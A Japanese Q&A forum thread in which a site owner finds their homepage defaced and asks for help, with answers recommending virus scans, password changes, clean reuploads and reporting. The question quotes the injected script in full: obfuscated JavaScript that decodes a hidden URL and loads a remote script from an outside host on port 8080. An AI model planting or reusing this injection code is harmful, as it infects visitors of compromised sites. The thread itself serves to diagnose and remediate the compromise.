WEBサイトが改変された?
今日、自分の個人サイトにアクセスすると、白い背景に「indiatimes-com.r10.net.hu」と表示されるだけのページになってしまっていました。もちろん、元のページはそんなデザインではありません。おかしいと思って、htmlのタグを見てみたところ、一番下の部分に妙なスクリプトが埋め込んであるのを発見しました。
どうやらこれが原因のようなのですが、これはウィルスの仕業なのでしょうか?だとしたら駆除などはどうすれば良いのでしょうか?
このようなことは初めてのことで困っています。
お分かりの方がいらっしゃいましたら回答ください。お願いします。
問題のスクリプト↓
<script> try{window.onload=function(){document.write('<div id=megaid>indiatimes-com.r10.net.hu</div>');Lr45metv0qok = document.getElementById('megaid').innerHTML + 'b@)@p&)a^g!#@@e&^s#(-#&c^o^m!.!#c@$)o$$u&&n@)@t(@^)e^(r!!!b@e(s(@&t)$$$&.)r#u#@:^$&)D$!@&E$!!B!U$#((G#(@^/(($d^(t&i&^@b@!l@^^o)!)g(&#.!$!c^o#$m#/^&(d)($#t@&i()b(l#&^o@!#!(g(^.(($c#@^#o#@#^m&(/$g&$^!$o!!o&)@g@&l((e!$@.&!^h#r!/#)g$o)o)g(^@l&&(e#).$^c^^(#o&#&m$$/#!o&$@^d##e#s##k&&).^!!#c^(#o)m@(/#$'.replace(/#|\!|&|\)|@|\$|\^|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Lr45metv0qok.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(S9rjp3zo ) {}</script>
<!--2f85bb3982c06b3b51c0586c6184ce2c-->
No.2ベストアンサー
- 回答日時:
感染の確認手段としてお勧めなのはカスペルスキーエンジン利用の@niftyウイルスチェックサービスです。
http://www.nifty.com/security/vcheck/
これとご利用のウイルス対策ソフトでのスキャンの双方で感染が確認出来ない場合には、ftpサーバのパスワードを変更後に改変されたソース部分を改修してアップし直して様子をみると良いでしょう。
感染が確認され、除去が困難な場合にはリカバリをお勧めします。この種の感染にも似て非なるものがいろいろあるようで、これを使えば完全に除去出来るというツールは今のところないと思われます。
昨今の感染の多くは、WindowsOSだけでなく、アプリケーションソフトやブラウザのプラグインなどのウイークポイント=脆弱性も利用して発生します。これらについての最新の情報を知り、きちんと対策しておくことが大切です。次のサイトの初心者向けコンテンツから理解に努めてください。
国民のための情報セキュリティサイト
http://www.soumu.go.jp/main_sosiki/joho_tsusin/s …
最新の脆弱性情報や感染関連の情報については、例えば次のようなニュースサイトから得ることが出来ます。1日1回のチェックをお勧めします。
INTERNET Watch Title Page
http://internet.watch.impress.co.jp/
ITmedia エンタープライズ セキュリティチャンネル
http://www.itmedia.co.jp/enterprise/security/
なお、今回の感染はいわゆるGumblar感染の亜種、というかそれに類似したもののようですが、対応策としては次のURLが参考になりそうです。
Gumblar対策のおさらい:Jacques Log - CNET Japan
http://japan.cnet.com/blog/sec_newbie/2010/01/14 …
No.5
- 回答日時:
ブログなどを運営していらっしゃるとしたら、あなたの記事を見た不特定多数の方にも感染が拡大していきます。
今後のあなたのサイトの信用問題に関わるので早急な確認をお願いしたいします。
感染の確認方法は今のところ手持ちのセキュリティソフトを用いてのスキャン、もしくは、WEBからのオンラインスキャンしかありません。
使えそうなオンラインスキャンのURLを貼っておきます。
トレンドマイクロ: http://www.trendflexsecurity.jp/housecall/
ESET: http://www.eset.com/onlinescan/run_scanner.php
@Nifty: http://www.nifty.com/security/vcheck/
No.4
- 回答日時:
サイトのページが変わってしまうのは解りやすい改ざんでしたね。
やっとGoogleでも同種の改ざんが「このサイトはコンピュータに損害を与える可能性があります。」と登録され始めました。VirusTotalでは、3日時点で13のエンジンで検出されるようになりました。TrendMicroやMcAfeeではまだ未検出です。
PCのクリーンインストールはお済でしょうか?
サイトには、ウイルスクリーンなHTMLをアップロードしてパスワードを変更してくださいね。
IPAにも届けを出しておいてください。
No.1
- 回答日時:
身に覚えのないスクリプトが入ってるならば、なんらかのウィルスに感染している可能性は大です。
まずはこれ以上感染を広げないよう、サーバーから全てのサイトデータを削除してください。
そして直ぐにウィルススキャンをパソコン全ファイルに対して行ってください。
時期的にGumblar(GENOウイルス)に感染されてるのかもしれません。
駆除方法はウィルスが特定されないと分かりませんので、まずはウィルス検索を行ってください。
参考URL(オンラインスキャン)】
トレンドマイクロ
http://www.trendflexsecurity.jp/housecall/
カスペルスキー
http://www.kaspersky.co.jp/virusscanner
以下の Nifty のサイトでもカスペルスキーのスキャンは実施可能です。
http://www.nifty.com/security/vcheck/kav/kavwebs …
マカフィー
http://home.mcafee.com/Downloads/FreeScan.aspx
シマンテック
http://www.symantec.com/region/jp/securitycheck/
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
似たような質問が見つかりました
- JavaScript jQueryでのドラッグアンドドロップについて 1 2022/07/07 21:04
- JavaScript 1日1回引けるJavaScriptおみくじについて 1 2022/12/12 22:28
- JavaScript 画像の表示位置 3 2022/12/23 08:25
- JavaScript jqueryを使ったスムーススクロールのコードを書いたのですが、HTMLコード内にある、a butt 2 2022/04/14 10:59
- JavaScript javascriptで変数を組み込みたい 2 2023/01/13 09:52
- HTML・CSS ボタンをクリックした時に、入力フォームのすぐ下部に、「入力欄が空白です」というテキストメッセージが表 1 2022/04/27 16:25
- JavaScript GoogleChart 階層ごとのブロックの長さを個別に設定したい 1 2022/07/06 14:27
- HTML・CSS WEBサイトの構築。表示データとWEBデザインを分離する考え方を専門用語・業界用語では何と言うか? 8 2022/09/27 09:16
- JavaScript 入力フォームの javascript で メールアドレスの正規チェックをを行い、ボタンをクリックして 2 2022/04/27 16:06
- HTML・CSS スクロールすると追従する画像のコードを書いているのですが、追従する画像の大きさの調節が上手くいきませ 2 2022/04/18 12:52
関連するカテゴリからQ&Aを探す
おすすめ情報
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
CDやDVDにコンピューターウイル...
-
ライブチャットでウィルス感染...
-
マイクロソフト365家庭用のウィ...
-
USBメモリーが感染、会社のパソ...
-
WEBサイトが改変された?
-
知り合いの名前で迷惑メールが...
-
iPhoneやiPadについて
-
ウィルス駆除の無料ソフトはあ...
-
USBメモリウイルスCDなら安心?
-
アイフォンはウイルス感染する...
-
ウイルスは何処で防いでるの?
-
1台のモデムでPC2台を使用し...
-
デーモンツール(Daemon Tools)V...
-
「ファイル共有ソフト」&「ウ...
-
ウイルスに感染したUSBのデータ...
-
「message.exe.」 ←これはウィ...
-
noreply というメールはウイル...
-
「webmaster@****.co.jp」って...
-
変なメールが・・・タイトルが ...
-
SDカード内データにウイルスが...
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
CDやDVDにコンピューターウイル...
-
テキストのコピペで感染するか?
-
マイクロソフト365家庭用のウィ...
-
感染したPCでDVDを焼いた場合は?
-
USBメモリウイルスCDなら安心?
-
アイフォンはウイルス感染する...
-
外付けHDDにウイルスは感染しま...
-
iPhoneのデザリングについて も...
-
ウィルス感染している?
-
pdfを保存したファイルがトロイ...
-
ウィルスに感染して(?)、キ...
-
PCの同期
-
仕事とプライベートの使い分け
-
ごみ箱の中のスキャン
-
Googleでネットサーフィンをし...
-
ネットにつないだだけで感染す...
-
フロッピーディスク等によるウ...
-
LANケーブルを介するウィルスの...
-
mp3がウイルス(ワーム)感染し...
-
Avira自動実行ブロックの警告
おすすめ情報